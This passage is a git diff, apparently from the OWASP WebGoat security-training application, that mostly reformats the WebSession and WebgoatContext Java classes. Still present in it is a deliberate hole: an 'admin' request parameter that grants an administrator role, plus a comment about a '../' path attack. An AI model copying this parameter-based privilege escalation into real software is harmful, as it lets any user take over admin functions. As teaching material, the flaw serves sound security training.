+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -85,9 +83,9 @@ public class WebSession
 	 */
 	public final static String COLOR = "color";
 
-	/**
-	 * Description of the Field
-	 */
+	/**
+	 * Description of the Field
+	 */
 	public final static int ERROR = 0;
 
 	public static final String STAGE = "stage";
@@ -107,7 +105,6 @@ public class WebSession
 	 */
 	public final static String RESTART = "Restart";
 
-
 	/**
 	 * Description of the Field
 	 */
@@ -124,9 +121,9 @@ public class WebSession
 	public final static String SESSION = "Session";
 
 	public final static String SHOWSOURCE = "ShowSource";
-	
+
 	public final static String SHOWSOLUTION = "ShowSolution";
-	
+
 	public final static String SHOWHINTS = "ShowHints";
 
 	public final static String SHOW = "show";
@@ -151,7 +148,7 @@ public class WebSession
 	public final static int WELCOME = -1;
 
 	private WebgoatContext webgoatContext;
-	
+
 	private ServletContext context = null;
 
 	private Course course;
@@ -173,7 +170,7 @@ public class WebSession
 	private boolean isDebug = false;
 	private boolean hasHackedHackableAdmin = false;
 
-	private StringBuffer message = new StringBuffer( "" );
+	private StringBuffer message = new StringBuffer("");
 
 	private ParameterParser myParser;
 
@@ -183,7 +180,7 @@ public class WebSession
 
 	private String servletName;
 
-	private HashMap<String,Object> session = new HashMap<String, Object>();
+	private HashMap<String, Object> session = new HashMap<String, Object>();
 
 	private boolean showCookies = false;
 
@@ -196,16 +193,18 @@ public class WebSession
 	private boolean showSolution = false;
 
 	private boolean completedHackableAdmin = false;
-	
+
 	private int currentMenu;
 
 	/**
 	 * Constructor for the WebSession object
 	 * 
-	 * @param servlet Description of the Parameter
-	 * @param context Description of the Parameter
+	 * @param servlet
+	 *            Description of the Parameter
+	 * @param context
+	 *            Description of the Parameter
 	 */
-	public WebSession(WebgoatContext webgoatContext, ServletContext context )
+	public WebSession(WebgoatContext webgoatContext, ServletContext context)
 	{
 		this.webgoatContext = webgoatContext;
 		// initialize from web.xml
@@ -216,28 +215,30 @@ public class WebSession
 		showRequest = webgoatContext.isShowRequest();
 		this.context = context;
 		course = new Course();
-		course.loadCourses( webgoatContext, context, "/" );
+		course.loadCourses(webgoatContext, context, "/");
 	}
 
-	public static synchronized Connection getConnection(WebSession s) 
-			throws SQLException, ClassNotFoundException
+	public static synchronized Connection getConnection(WebSession s) throws SQLException, ClassNotFoundException
 	{
 		return DatabaseUtilities.getConnection(s);
 	}
 
-	public static void returnConnection(WebSession s) {
+	public static void returnConnection(WebSession s)
+	{
 		DatabaseUtilities.returnConnection(s.getUserName());
 	}
-	
+
 	/**
 	 * Description of the Method
 	 * 
-	 * @param key Description of the Parameter
-	 * @param value Description of the Parameter
+	 * @param key
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
 	 */
-	public void add( String key, Object value )
+	public void add(String key, Object value)
 	{
-		session.put( key, value );
+		session.put(key, value);
 	}
 
 	/**
@@ -245,7 +246,7 @@ public class WebSession
 	 */
 	public void clearMessage()
 	{
-		message.setLength( 0 );
+		message.setLength(0);
 	}
 
 	/**
@@ -255,12 +256,12 @@ public class WebSession
 	{
 		Cookie[] cookies = request.getCookies();
 
-		for ( int loop = 0; loop < cookies.length; loop++ )
+		for (int loop = 0; loop < cookies.length; loop++)
 		{
-			if ( !cookies[loop].getName().startsWith( "JS" ) )
+			if (!cookies[loop].getName().startsWith("JS"))
 			{// skip jsessionid cookie
-				cookies[loop].setMaxAge( 0 );// mark for deletion by browser
-				response.addCookie( cookies[loop] );
+				cookies[loop].setMaxAge(0);// mark for deletion by browser
+				response.addCookie(cookies[loop]);
 			}
 		}
 	}
@@ -268,12 +269,13 @@ public class WebSession
 	/**
 	 * Description of the Method
 	 * 
-	 * @param key Description of the Parameter
+	 * @param key
+	 *            Description of the Parameter
 	 * @return Description of the Return Value
 	 */
-	public Object get( String key )
+	public Object get(String key)
 	{
-		return ( session.get( key ) );
+		return (session.get(key));
 	}
 
 	/**
@@ -295,13 +297,13 @@ public class WebSession
 		{
 			roles.add(AbstractLesson.ADMIN_ROLE);
 		}
-		
+
 		return roles;
 	}
-	
+
 	public String getRole()
 	{
-		
+
 		String role = "";
 		if (isAdmin())
 		{
@@ -310,7 +312,7 @@ public class WebSession
 		else if (isHackedAdmin())
 		{
 			role = AbstractLesson.HACKED_ADMIN_ROLE;
-		} 
+		}
 		else if (isChallenge())
 		{
 			role = AbstractLesson.CHALLENGE_ROLE;
@@ -319,10 +321,10 @@ public class WebSession
 		{
 			role = AbstractLesson.USER_ROLE;
 		}
-		
+
 		return role;
 	}
-	
+
 	/**
 	 * Gets the course attribute of the WebSession object
 	 * 
@@ -333,7 +335,7 @@ public class WebSession
 		return course;
 	}
 
-	public void setCourse( Course course )
+	public void setCourse(Course course)
 	{
 		this.course = course;
 	}
@@ -345,10 +347,10 @@ public class WebSession
 	 */
 	public int getCurrentScreen()
 	{
-		return ( currentScreen );
+		return (currentScreen);
 	}
 
-	public void setCurrentScreen( int screen )
+	public void setCurrentScreen(int screen)
 	{
 		currentScreen = screen;
 	}
@@ -357,7 +359,7 @@ public class WebSession
 	{
 		return getCurrentLesson().getLink() + "&" + RESTART + "=" + getCurrentScreen();
 	}
-	
+
 	public String getCurrentLink()
 	{
 		String thisLink = "attack";
@@ -383,19 +385,19 @@ public class WebSession
 
 	public AbstractLesson getCurrentLesson()
 	{
-		return getCourse().getLesson( this, getCurrentScreen(), getRoles() );
+		return getCourse().getLesson(this, getCurrentScreen(), getRoles());
 	}
-	
+
 	public AbstractLesson getLesson(int id)
 	{
-		return getCourse().getLesson( this, id, getRoles() );
+		return getCourse().getLesson(this, id, getRoles());
 	}
-	
+
 	public List<AbstractLesson> getLessons(Category category)
 	{
-		return getCourse().getLessons( this, category, getRoles() );
+		return getCourse().getLessons(this, category, getRoles());
 	}
-	
+
 	/**
 	 * Gets the hint1 attribute of the WebSession object
 	 * 
@@ -403,18 +405,17 @@ public class WebSession
 	 */
 	private int getHintNum()
 	{
-		return ( hintNum );
+		return (hintNum);
 	}
 
 	public String getHint()
 	{
 		String hint = null;
 		int hints = getCurrentLesson().getHintCount(this);
-		if (getHintNum() > hints)
-			hintNum = -1;
-		if ( getHintNum() >= 0 )
-			// FIXME
-			hint = getCurrentLesson().getHint( this, getHintNum() );
+		if (getHintNum() > hints) hintNum = -1;
+		if (getHintNum() >= 0)
+		// FIXME
+			hint = getCurrentLesson().getHint(this, getHintNum());
 
 		return hint;
 	}
@@ -423,25 +424,25 @@ public class WebSession
 	{
 		Vector<Parameter> params = null;
 
-		if ( showParams() && getParser() != null )
+		if (showParams() && getParser() != null)
 		{
 			params = new Vector<Parameter>();
 
 			Enumeration e = getParser().getParameterNames();
 
-			while ( ( e != null ) && e.hasMoreElements() )
+			while ((e != null) && e.hasMoreElements())
 			{
 				String name = (String) e.nextElement();
-				String[] values = getParser().getParameterValues( name );
+				String[] values = getParser().getParameterValues(name);
 
-				for ( int loop = 0; ( values != null ) && ( loop < values.length ); loop++ )
+				for (int loop = 0; (values != null) && (loop < values.length); loop++)
 				{
-					params.add( new Parameter( name, values[loop] ) );
+					params.add(new Parameter(name, values[loop]));
 					// params.add( name + " -> " + values[loop] );
 				}
 			}
 
-			Collections.sort( params );
+			Collections.sort(params);
 		}
 
 		return params;
@@ -451,16 +452,11 @@ public class WebSession
 	{
 		List cookies = null;
 
-		if ( showCookies() )
-			cookies = Arrays.asList( request.getCookies() );
+		if (showCookies()) cookies = Arrays.asList(request.getCookies());
 
 		/*
-		 * List cookies = new Vector();
-		 * 
-		 * HttpServletRequest request = getRequest(); Cookie[] cookies = request.getCookies();
-		 * 
-		 * if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); }
-		 * 
+		 * List cookies = new Vector(); HttpServletRequest request = getRequest(); Cookie[] cookies =
+		 * request.getCookies(); if ( cookies.length == 0 ) { list.addElement( new LI( "No Cookies" ) ); }
 		 * for ( int i = 0; i < cookies.length; i++ ) { Cookie cookie = cookies[i];
 		 * cookies.add(cookie); //list.addElement( new LI( cookie.getName() + " -> " +
 		 * cookie.getValue() ) ); }
@@ -472,41 +468,39 @@ public class WebSession
 	/**
 	 * Gets the cookie attribute of the CookieScreen object
 	 * 
-	 * @param s Description of the Parameter
+	 * @param s
+	 *            Description of the Parameter
 	 * @return The cookie value
 	 */
-	public String getCookie( String cookieName )
+	public String getCookie(String cookieName)
 	{
 		Cookie[] cookies = getRequest().getCookies();
 
-		for ( int i = 0; i < cookies.length; i++ )
+		for (int i = 0; i < cookies.length; i++)
 		{
-			if ( cookies[i].getName().equalsIgnoreCase( cookieName ) )
-			{
-				return ( cookies[i].getValue() );
-			}
+			if (cookies[i].getName().equalsIgnoreCase(cookieName)) { return (cookies[i].getValue()); }
 		}
 
-		return ( null );
+		return (null);
 	}
-	
+
 	public String getSource()
 	{
 		return "Sorry.  No Java Source viewing available.";
-		//return getCurrentLesson().getSource(this);
+		// return getCurrentLesson().getSource(this);
 	}
 
 	public String getSolution()
 	{
 		return "Sorry.  No solution is available.";
-		//return getCurrentLesson().getSolution(this);
+		// return getCurrentLesson().getSolution(this);
 	}
 
 	public String getInstructions()
 	{
-		return getCurrentLesson().getInstructions(this);		
+		return getCurrentLesson().getInstructions(this);
 	}
-	
+
 	/**
 	 * Gets the message attribute of the WebSession object
 	 * 
@@ -514,7 +508,7 @@ public class WebSession
 	 */
 	public String getMessage()
 	{
-		return ( message.toString() );
+		return (message.toString());
 	}
 
 	/**
@@ -524,7 +518,7 @@ public class WebSession
 	 */
 	public ParameterParser getParser()
 	{
-		return ( myParser );
+		return (myParser);
 	}
 
 	/**
@@ -534,7 +528,7 @@ public class WebSession
 	 */
 	public int getPreviousScreen()
 	{
-		return ( previousScreen );
+		return (previousScreen);
 	}
 
 	/**
@@ -547,7 +541,7 @@ public class WebSession
 		return request;
 	}
 
-	public void setRequest( HttpServletRequest request )
+	public void setRequest(HttpServletRequest request)
 	{
 		this.request = request;
 	}
@@ -569,19 +563,20 @@ public class WebSession
 	 */
 	public String getServletName()
 	{
-		return ( servletName );
+		return (servletName);
 	}
 
 	/**
 	 * Gets the sourceFile attribute of the WebSession object
 	 * 
-	 * @param screen Description of the Parameter
+	 * @param screen
+	 *            Description of the Parameter
 	 * @return The sourceFile value
 	 */
-	public String getWebResource( String fileName )
+	public String getWebResource(String fileName)
 	{
 		// Note: doesn't work for admin path! Maybe with a ../ attack
-		return ( context.getRealPath( fileName ));
+		return (context.getRealPath(fileName));
 	}
 
 	/**
@@ -591,7 +586,7 @@ public class WebSession
 	 */
 	public boolean isAdmin()
 	{
-		return ( isAdmin );
+		return (isAdmin);
 	}
 
 	/**
@@ -601,7 +596,7 @@ public class WebSession
 	 */
 	public boolean isHackedAdmin()
 	{
-		return ( isHackedAdmin );
+		return (isHackedAdmin);
 	}
 
 	/**
@@ -611,7 +606,7 @@ public class WebSession
 	 */
 	public boolean completedHackableAdmin()
 	{
-		return ( completedHackableAdmin );
+		return (completedHackableAdmin);
 	}
 
 	/**
@@ -621,41 +616,40 @@ public class WebSession
 	 */
 	public boolean isAuthenticated()
 	{
-		return ( isAuthenticated );
+		return (isAuthenticated);
 	}
-	
+
 	private Map<AbstractLesson, LessonSession> lessonSessions = new Hashtable<AbstractLesson, LessonSession>();
 
-	
 	public boolean isAuthenticatedInLesson(AbstractLesson lesson)
 	{
 		boolean authenticated = false;
-		
+
 		LessonSession lessonSession = getLessonSession(lesson);
 		if (lessonSession != null)
 		{
 			authenticated = lessonSession.isAuthenticated();
 		}
-		//System.out.println("Authenticated for lesson " + lesson + "? " + authenticated);
-		
+		// System.out.println("Authenticated for lesson " + lesson + "? " + authenticated);
+
 		return authenticated;
 	}
-	
+
 	public boolean isAuthorizedInLesson(int employeeId, String functionId)
 	{
 		return getCurrentLesson().isAuthorized(this, employeeId, functionId);
 	}
-	
+
 	public boolean isAuthorizedInLesson(String role, String functionId)
 	{
 		return getCurrentLesson().isAuthorized(this, role, functionId);
 	}
-	
+
 	public int getUserIdInLesson() throws ParameterNotFoundException
 	{
 		return getCurrentLesson().getUserId(this);
 	}
-	
+
 	public String getUserNameInLesson() throws ParameterNotFoundException
 	{
 		return getCurrentLesson().getUserName(this);
@@ -667,12 +661,12 @@ public class WebSession
 		LessonSession lessonSession = new LessonSession();
 		lessonSessions.put(lesson, lessonSession);
 	}
-	
+
 	public void closeLessonSession(AbstractLesson lesson)
 	{
 		lessonSessions.remove(lesson);
 	}
-	
+
 	public LessonSession getLessonSession(AbstractLesson lesson)
 	{
 		return (LessonSession) lessonSessions.get(lesson);
@@ -685,10 +679,7 @@ public class WebSession
 	 */
 	public boolean isChallenge()
 	{
-		if ( getCurrentLesson() != null )
-		{
-			return ( Category.CHALLENGE.equals(getCurrentLesson().getCategory()));
-		}
+		if (getCurrentLesson() != null) { return (Category.CHALLENGE.equals(getCurrentLesson().getCategory())); }
 		return false;
 	}
 
@@ -699,18 +690,19 @@ public class WebSession
 	 */
 	public boolean isColor()
 	{
-		return ( isColor );
+		return (isColor);
 	}
 
 	/**
 	 * Gets the screen attribute of the WebSession object
 	 * 
-	 * @param value Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
 	 * @return The screen value
 	 */
-	public boolean isScreen( int value )
+	public boolean isScreen(int value)
 	{
-		return ( getCurrentScreen() == value );
+		return (getCurrentScreen() == value);
 	}
 
 	/**
@@ -720,17 +712,18 @@ public class WebSession
 	 */
 	public boolean isUser()
 	{
-		return ( !isAdmin && !isChallenge() );
+		return (!isAdmin && !isChallenge());
 	}
 
 	/**
 	 * Sets the message attribute of the WebSession object
 	 * 
-	 * @param text The new message value
+	 * @param text
+	 *            The new message value
 	 */
-	public void setMessage( String text )
+	public void setMessage(String text)
 	{
-		message.append( "<BR>" + " * " + text);
+		message.append("<BR>" + " * " + text);
 	}
 
 	/**
@@ -740,10 +733,9 @@ public class WebSession
 	 */
 	public boolean showCookies()
 	{
-		return ( showCookies );
+		return (showCookies);
 	}
 
-
 	/**
 	 * Description of the Method
 	 * 
@@ -751,7 +743,7 @@ public class WebSession
 	 */
 	public boolean showParams()
 	{
-		return ( showParams );
+		return (showParams);
 	}
 
 	/**
@@ -761,7 +753,7 @@ public class WebSession
 	 */
 	public boolean showRequest()
 	{
-		return ( showRequest );
+		return (showRequest);
 	}
 
 	/**
@@ -771,12 +763,12 @@ public class WebSession
 	 */
 	public boolean showSource()
 	{
-		return ( showSource );
+		return (showSource);
 	}
 
 	public boolean showSolution()
 	{
-		return ( showSolution );
+		return (showSolution);
 	}
 
 	/**
@@ -791,17 +783,19 @@ public class WebSession
 		// System.out.println("Name: " + getRequest().getUserPrincipal().getName( ) );
 		return getRequest().getUserPrincipal().getName();
 	}
-	
+
 	/**
 	 * Parse parameters from the given request, handle any servlet commands, and update this session
 	 * based on the parameters.
 	 * 
-	 * @param request Description of the Parameter
-	 * @param response Description of the Parameter
-	 * @param name Description of the Parameter
+	 * @param request
+	 *            Description of the Parameter
+	 * @param response
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
 	 */
-	public void update( HttpServletRequest request, HttpServletResponse response, String name )
-			throws IOException
+	public void update(HttpServletRequest request, HttpServletResponse response, String name) throws IOException
 	{
 		String content = null;
 
@@ -810,22 +804,22 @@ public class WebSession
 		this.response = response;
 		this.servletName = name;
 
-		if ( myParser == null )
+		if (myParser == null)
 		{
-			myParser = new ParameterParser( request );
+			myParser = new ParameterParser(request);
 		}
 		else
 		{
-			myParser.update( request );
+			myParser.update(request);
 		}
 
 		// System.out.println("Current Screen 1: " + currentScreen );
 		// System.out.println("Previous Screen 1: " + previousScreen );
 		// FIXME: requires ?Logout=true
 		// FIXME: doesn't work right -- no reauthentication
-		if ( myParser.getRawParameter( LOGOUT, null ) != null )
+		if (myParser.getRawParameter(LOGOUT, null) != null)
 		{
-			System.out.println( "Logout " + request.getUserPrincipal() );
+			System.out.println("Logout " + request.getUserPrincipal());
 			eatCookies();
 			request.getSession().invalidate();
 			currentScreen = WELCOME;
@@ -835,9 +829,9 @@ public class WebSession
 		// There are several scenarios where we want the first lesson to be loaded
 		// 1) Previous screen is Welcome - Start of the course
 		// 2) After a logout and after the session has been reinitialized
-		if ( ( this.getPreviousScreen() == WebSession.WELCOME ) || ( getRequest().getSession( false ) != null &&
+		if ((this.getPreviousScreen() == WebSession.WELCOME) || (getRequest().getSession(false) != null &&
 		// getRequest().getSession(false).isNew() &&
-				this.getCurrentScreen() == WebSession.WELCOME && this.getPreviousScreen() == WebSession.ERROR ) )
+				this.getCurrentScreen() == WebSession.WELCOME && this.getPreviousScreen() == WebSession.ERROR))
 		{
 			currentScreen = course.getFirstLesson().getScreenId();
 			hintNum = -1;
@@ -852,95 +846,95 @@ public class WebSession
 		{
 			// If the request is new there should be no parameters.
 			// This can occur from a session timeout or a the starting of a new course.
-			if ( !request.getSession().isNew() )
+			if (!request.getSession().isNew())
 			{
-				currentScreen = myParser.getIntParameter( SCREEN, currentScreen );
+				currentScreen = myParser.getIntParameter(SCREEN, currentScreen);
 			}
 			else
 			{
-				if ( !myParser.getRawParameter( SCREEN, "NULL" ).equals( "NULL" ) )
+				if (!myParser.getRawParameter(SCREEN, "NULL").equals("NULL"))
 				{
-					this.setMessage( "Session Timeout - Starting new Session." );
+					this.setMessage("Session Timeout - Starting new Session.");
 				}
 			}
-		}
-		catch ( Exception e )
+		} catch (Exception e)
 		{
 		}
 
 		// clear variables when switching screens
-		if ( this.getCurrentScreen() != this.getPreviousScreen() )
+		if (this.getCurrentScreen() != this.getPreviousScreen())
 		{
-			if ( webgoatContext.isDebug() )
+			if (webgoatContext.isDebug())
 			{
-				setMessage( "Changed to a new screen, clearing cookies and hints" );
+				setMessage("Changed to a new screen, clearing cookies and hints");
 			}
 			eatCookies();
 			hintNum = -1;
 		}
-		else if (myParser.getRawParameter( STAGE, null ) != null) 
+		else if (myParser.getRawParameter(STAGE, null) != null)
 		{
 			AbstractLesson al = getCurrentLesson();
 			if (al instanceof SequentialLessonAdapter)
 			{
-			SequentialLessonAdapter sla = (SequentialLessonAdapter) al;
-			int stage = myParser.getIntParameter(STAGE, sla.getStage(this));
-			if (stage > 0 && stage <= sla.getStageCount())
-				sla.setStage(this, stage);
+				SequentialLessonAdapter sla = (SequentialLessonAdapter) al;
+				int stage = myParser.getIntParameter(STAGE, sla.getStage(this));
+				if (stage > 0 && stage <= sla.getStageCount()) sla.setStage(this, stage);
 			}
 			else if (al instanceof RandomLessonAdapter)
 			{
-			try
-			{
-			RandomLessonAdapter rla = (RandomLessonAdapter) al;
-			int stage = myParser.getIntParameter(STAGE) - 1;
-			String[] stages = rla.getStages();
-			if (stage>=0 && stage < stages.length)
-				rla.setStage(this, stages[stage]);
-			} catch (ParameterNotFoundException pnfe) {}
+				try
+				{
+					RandomLessonAdapter rla = (RandomLessonAdapter) al;
+					int stage = myParser.getIntParameter(STAGE) - 1;
+					String[] stages = rla.getStages();
+					if (stage >= 0 && stage < stages.length) rla.setStage(this, stages[stage]);
+				} catch (ParameterNotFoundException pnfe)
+				{
+				}
 			}
 		}
 		// else update global variables for the current screen
 		else
 		{
 			// Handle "restart" commands
-			int lessonId = myParser.getIntParameter( RESTART, -1 );
-			if ( lessonId != -1 )
+			int lessonId = myParser.getIntParameter(RESTART, -1);
+			if (lessonId != -1)
 			{
 				restartLesson(lessonId);
 			}
-			//if ( myParser.getBooleanParameter( RESTART, false ) )
-			//{
-			//	getCurrentLesson().getLessonTracker( this ).getLessonProperties().setProperty( CHALLENGE_STAGE, "1" );
-			//}
-			
+			// if ( myParser.getBooleanParameter( RESTART, false ) )
+			// {
+			// getCurrentLesson().getLessonTracker( this ).getLessonProperties().setProperty(
+			// CHALLENGE_STAGE, "1" );
+			// }
+
 			// Handle "show" commands
-			String showCommand = myParser.getStringParameter( SHOW, null );
-			if ( showCommand != null )
+			String showCommand = myParser.getStringParameter(SHOW, null);
+			if (showCommand != null)
 			{
-				if ( showCommand.equalsIgnoreCase( SHOW_PARAMS ) )
+				if (showCommand.equalsIgnoreCase(SHOW_PARAMS))
 				{
 					showParams = !showParams;
 				}
-				else if ( showCommand.equalsIgnoreCase( SHOW_COOKIES ) )
+				else if (showCommand.equalsIgnoreCase(SHOW_COOKIES))
 				{
 					showCookies = !showCookies;
 				}
-				else if ( showCommand.equalsIgnoreCase( SHOW_SOURCE ) )
+				else if (showCommand.equalsIgnoreCase(SHOW_SOURCE))
 				{
 					content = getSource();
-					//showSource = true;
+					// showSource = true;
 				}
-				else if ( showCommand.equalsIgnoreCase( SHOW_SOLUTION ) )
+				else if (showCommand.equalsIgnoreCase(SHOW_SOLUTION))
 				{
 					content = getSolution();
-					//showSource = true;
+					// showSource = true;
 				}
-				else if ( showCommand.equalsIgnoreCase( SHOW_NEXTHINT ) )
+				else if (showCommand.equalsIgnoreCase(SHOW_NEXTHINT))
 				{
 					getNextHint();
 				}
-				else if ( showCommand.equalsIgnoreCase( SHOW_PREVIOUSHINT ) )
+				else if (showCommand.equalsIgnoreCase(SHOW_PREVIOUSHINT))
 				{
 					getPreviousHint();
 				}
@@ -948,58 +942,58 @@ public class WebSession
 
 		}
 
-		isAdmin = request.isUserInRole( WEBGOAT_ADMIN );
-		isHackedAdmin = myParser.getBooleanParameter( ADMIN, isAdmin );
-		if ( isHackedAdmin )
+		isAdmin = request.isUserInRole(WEBGOAT_ADMIN);
+		isHackedAdmin = myParser.getBooleanParameter(ADMIN, isAdmin);
+		if (isHackedAdmin)
 		{
 			System.out.println("Hacked admin");
 			hasHackedHackableAdmin = true;
 		}
-		isColor = myParser.getBooleanParameter( COLOR, isColor );
-		isDebug = myParser.getBooleanParameter( DEBUG, isDebug );
+		isColor = myParser.getBooleanParameter(COLOR, isColor);
+		isDebug = myParser.getBooleanParameter(DEBUG, isDebug);
 
 		// System.out.println( "showParams:" + showParams );
 		// System.out.println( "showSource:" + showSource );
 		// System.out.println( "showSolution:" + showSolution );
 		// System.out.println( "showCookies:" + showCookies );
 		// System.out.println( "showRequest:" + showRequest );
-		
+
 		if (content != null)
 		{
 			response.setContentType("text/html");
 			PrintWriter out = new PrintWriter(response.getOutputStream());
-			out.print(content);	
+			out.print(content);
 			out.flush();
 			out.close();
 		}
 	}
-	
+
 	private void restartLesson(int lessonId)
 	{
 		AbstractLesson al = getLesson(lessonId);
 		System.out.println("Restarting lesson: " + al);
-		al.getLessonTracker( this ).setCompleted(false);
+		al.getLessonTracker(this).setCompleted(false);
 		if (al instanceof SequentialLessonAdapter)
 		{
-		SequentialLessonAdapter sla = (SequentialLessonAdapter) al;
-		sla.getLessonTracker( this ).setStage(1);
+			SequentialLessonAdapter sla = (SequentialLessonAdapter) al;
+			sla.getLessonTracker(this).setStage(1);
 		}
 	}
 
 	/**
 	 * @param string
 	 */
-	public void setHasHackableAdmin( String role )
+	public void setHasHackableAdmin(String role)
 	{
-		hasHackedHackableAdmin = ( AbstractLesson.HACKED_ADMIN_ROLE.equals( role ) & hasHackedHackableAdmin );
+		hasHackedHackableAdmin = (AbstractLesson.HACKED_ADMIN_ROLE.equals(role) & hasHackedHackableAdmin);
 
 		// if the user got the Admin=true parameter correct AND they accessed an admin screen
-		if ( hasHackedHackableAdmin )
+		if (hasHackedHackableAdmin)
 		{
 			completedHackableAdmin = true;
 		}
 	}
-	
+
 	/**
 	 * @return Returns the isDebug.
 	 */
@@ -1009,12 +1003,13 @@ public class WebSession
 	}
 
 	/**
-	 * @param header - request header value to return
+	 * @param header -
+	 *            request header value to return
 	 * @return
 	 */
-	public String getHeader( String header )
+	public String getHeader(String header)
 	{
-		return getRequest().getHeader( header );
+		return getRequest().getHeader(header);
 	}
 
 	public String getNextHint()
@@ -1023,14 +1018,14 @@ public class WebSession
 
 		// FIXME
 		int maxHints = getCurrentLesson().getHintCount(this);
-		if ( hintNum < maxHints - 1 )
+		if (hintNum < maxHints - 1)
 		{
 			hintNum++;
 
 			// Hints are indexed from 0
-			getCurrentLesson().getLessonTracker( this ).setMaxHintLevel( getHintNum() + 1 );
+			getCurrentLesson().getLessonTracker(this).setMaxHintLevel(getHintNum() + 1);
 
-			hint = (String) getCurrentLesson().getHint( this, getHintNum() );
+			hint = (String) getCurrentLesson().getHint(this, getHintNum());
 		}
 
 		return hint;
@@ -1040,30 +1035,31 @@ public class WebSession
 	{
 		String hint = null;
 
-		if ( hintNum > 0 )
+		if (hintNum > 0)
 		{
 			hintNum--;
 
 			// Hints are indexed from 0
-			getCurrentLesson().getLessonTracker( this ).setMaxHintLevel( getHintNum() + 1 );
+			getCurrentLesson().getLessonTracker(this).setMaxHintLevel(getHintNum() + 1);
 
-			hint = (String) getCurrentLesson().getHint( this, getHintNum() );
+			hint = (String) getCurrentLesson().getHint(this, getHintNum());
 		}
 
 		return hint;
 	}
 
-	public void setCurrentMenu(Integer ranking) 
+	public void setCurrentMenu(Integer ranking)
 	{
 		currentMenu = ranking.intValue();
 	}
-	
+
 	public int getCurrentMenu()
 	{
-		return currentMenu;	
+		return currentMenu;
 	}
-	
-	public WebgoatContext getWebgoatContext() {
+
+	public WebgoatContext getWebgoatContext()
+	{
 		return webgoatContext;
 	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java
index f2a79223a..5a8f29fa6 100755
--- a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatContext.java
@@ -1,10 +1,12 @@
+
 package org.owasp.webgoat.session;
 
 import java.util.Iterator;
-
 import javax.servlet.http.HttpServlet;
 
-public class WebgoatContext {
+
+public class WebgoatContext
+{
 
 	public final static String DATABASE_CONNECTION_STRING = "DatabaseConnectionString";
 
@@ -17,7 +19,7 @@ public class WebgoatContext {
 	public final static String ENTERPRISE = "Enterprise";
 
 	public final static String CODING_EXERCISES = "CodingExercises";
-	
+
 	public final static String SHOWCOOKIES = "ShowCookies";
 
 	public final static String SHOWPARAMS = "ShowParams";
@@ -25,9 +27,9 @@ public class WebgoatContext {
 	public final static String SHOWREQUEST = "ShowRequest";
 
 	public final static String SHOWSOURCE = "ShowSource";
-	
+
 	public final static String SHOWSOLUTION = "ShowSolution";
-	
+
 	public final static String SHOWHINTS = "ShowHints";
 
 	public final static String DEFUSEOSCOMMANDS = "DefuseOSCommands";
@@ -61,7 +63,7 @@ public class WebgoatContext {
 	private boolean enterprise = false;
 
 	private boolean codingExercises = false;
-	
+
 	private String feedbackAddress = "<A HREF=mailto:webgoat@owasp.org>webgoat@owasp.org</A>";
 
 	private boolean isDebug = false;
@@ -70,57 +72,56 @@ public class WebgoatContext {
 
 	private HttpServlet servlet;
 
-	public WebgoatContext(HttpServlet servlet) {
+	public WebgoatContext(HttpServlet servlet)
+	{
 		this.servlet = servlet;
 		databaseConnectionString = getParameter(servlet, DATABASE_CONNECTION_STRING);
 		databaseDriver = getParameter(servlet, DATABASE_DRIVER);
 		databaseUser = getParameter(servlet, DATABASE_USER);
 		databasePassword = getParameter(servlet, DATABASE_PASSWORD);
-		
+
 		// initialize from web.xml
-		showParams = "true".equals( getParameter(servlet, SHOWPARAMS ) );
-		showCookies = "true".equals( getParameter(servlet, SHOWCOOKIES ) );
-		showSource = "true".equals( getParameter(servlet, SHOWSOURCE ) );
-		showSolution = "true".equals( getParameter( servlet, SHOWSOLUTION ) );
-		defuseOSCommands = "true".equals( getParameter(servlet, DEFUSEOSCOMMANDS ) );
-		enterprise = "true".equals( getParameter(servlet, ENTERPRISE ) );
-		codingExercises = "true".equals( getParameter(servlet, CODING_EXERCISES ) );
-		feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS ) != null ? 
-				getParameter(servlet, FEEDBACK_ADDRESS ) : feedbackAddress;
-		showRequest = "true".equals( getParameter(servlet, SHOWREQUEST ) );
-		isDebug = "true".equals( getParameter(servlet, DEBUG ) );
+		showParams = "true".equals(getParameter(servlet, SHOWPARAMS));
+		showCookies = "true".equals(getParameter(servlet, SHOWCOOKIES));
+		showSource = "true".equals(getParameter(servlet, SHOWSOURCE));
+		showSolution = "true".equals(getParameter(servlet, SHOWSOLUTION));
+		defuseOSCommands = "true".equals(getParameter(servlet, DEFUSEOSCOMMANDS));
+		enterprise = "true".equals(getParameter(servlet, ENTERPRISE));
+		codingExercises = "true".equals(getParameter(servlet, CODING_EXERCISES));
+		feedbackAddress = getParameter(servlet, FEEDBACK_ADDRESS) != null ? getParameter(servlet, FEEDBACK_ADDRESS)
+				: feedbackAddress;
+		showRequest = "true".equals(getParameter(servlet, SHOWREQUEST));
+		isDebug = "true".equals(getParameter(servlet, DEBUG));
 		servletName = servlet.getServletName();
-		
+
 	}
 
-	private String getParameter(HttpServlet servlet, String key) {
+	private String getParameter(HttpServlet servlet, String key)
+	{
 		String value = System.getenv().get(key);
-		if (value == null)
-			value = servlet.getInitParameter(key);
+		if (value == null) value = servlet.getInitParameter(key);
 		return value;
 	}
-	
+
 	/**
-	 * returns the connection string with the real path to the database
-	 * directory inserted at the word PATH
+	 * returns the connection string with the real path to the database directory inserted at the
+	 * word PATH
 	 * 
